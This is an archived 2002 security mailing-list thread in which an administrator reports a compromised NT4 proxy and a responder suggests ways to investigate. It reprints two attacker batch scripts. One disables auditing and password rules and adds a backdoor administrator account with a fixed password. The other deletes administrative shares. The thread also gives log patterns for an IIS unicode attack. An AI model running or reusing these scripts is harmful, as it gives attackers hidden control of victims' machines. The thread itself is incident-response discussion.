Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Proxy server hit... Any ideas?

From: Othenin-Girard Pascal <pascal.othenin-girard () lausanne ch>
Date: Wed, 20 Nov 2002 09:16:15 +0100
Hello,

well, i would say that you've probably been hacked in order for the
warez scene to distribute some stuff.....

        2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
        srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer
Utility
        Routine), and _zoLibr.dll

and you'are probably running a Serv-U ftp server, doing a "netstat -an"
should
list all connections of the machine, where you should see if some more
services than needed are running. And check for some *.rar, *.zip, if you
are
distributing warez you should find some Gb of those somewhere.

Other's files have been renamed in order to atempt to obfuscate the real
files usage. Bet you are also hosting kind of iroffer (an IRC bot, doing
XDCC serving).

To be sure of that, you can grab the file 

http://linux20368.dn.net/protools/files/utilities/fi.zip
(this is a exe file identifier, he will identify the packer if he know it)

and see what he report for each file you've found. Most probably, files are 
packed, a good bet would be UPX. Grab it from the main web site, and you 
may be able to unpack the files using the command upx -d <new_dumped_exe>

from them you can take the files in any hexeditor/disassembler in order
to find a way to identify the product. File properties may be sufficient for
this.
Once you've done that, you should have a good idea of what have been
installed, in wich order, the last point is to find out how at first they
came in

Are you running an IIS on your proxy ? (\scripts\sample\ ) if so you've
probably 
been hit by an unicode attack. Search for the following pattern in your
proxy log file : 
"cmd.exe" or "/dir+c" (this is the usual vuln test). And if you found some
installed
stuff like FTP server, bots, and found tracks of attack in your log then a
good bet
would be that the attack have been successful,.....

Hope this help
Regards
P.Girard

P.S. You should definitively remove the sample script folder from a
production computter. Not a good idea to keep them. You should also try
the Microsoft Lockdown tools, that does a good job securing IIS....




-----Message d'origine-----
De:   Mike Cain [SMTP:mikec () lpinsurance com]
Date: lundi, 18. novembre 2002 15:01
À:    incidents () securityfocus com
Objet:        Proxy server hit... Any ideas?

Well, I have had my first run-in with a hacker, or was it a virus? I'm
not 100% sure.. Guess I should start from the beginning...

A days ago, I began to get user complaints on the slowness of the
internet. I figured it was mostly them just wanting something to
complain about, so I did what all crappy admins do, I ignored it. Well,
last night the box was rebooted after some software was updated. Today
people were complaining about how PAINFULLY slow the internet was, so I
looked at the proxy server. NT4 running proxy3. I know, there is newer
better stuff, but its what I have to work with. :) SO... I looked at the
processes and noticed the CPU hovering at 35-50%.. Way too high. So a
quick look at the process list showed two things that I didn't remember
needing to be there, win.exe and start.exe. Next move was to find them,
and they were in the winnt\system\ folder. What I also found odd was
that there were three new folders in that directory all created on the
8th, NT, tools, and win. 

Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
(says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
Routine), and _zoLibr.dll

3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the sercure
and secure1 batch files, it looks like a root kit... But I'mm new at
this side of security I'mm aCiscoo guy...)

Last thing, the logs show that the attacker was hitting the
\scripts\sample\ folder... Meaning I think he was trying to use the old
IIS Sample Scripts to execute local code... Not sure if he was
successful...

Thanks in advance!!

Mike Cain
CCNP/MCSE


Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)

temp

echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\signsecure
channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\sealsecure
channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requirestr
ongkey=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requiresig
norseal=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\disablepas
swordchange=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\r
equiresecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nablesecuritysignature=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nableplaintextpassword=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\requir
esecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
securitysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
forcedlogoff=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\autodi
sconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session
manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory
management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman
print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0

temp

echo
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >>
temp
echo
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0

temp

echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0

temp

echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0

temp

echo
machine\software\microsoft\windows\currentversion\policies\system\shutdo
wnwithoutlogon=4,1 >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticetext=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticecaption=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\dontdi
splaylastusername=4,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040
8961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >>
temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >>
temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb
/CFG temp
echo System is now secure.



Secure1.bat

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld



--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: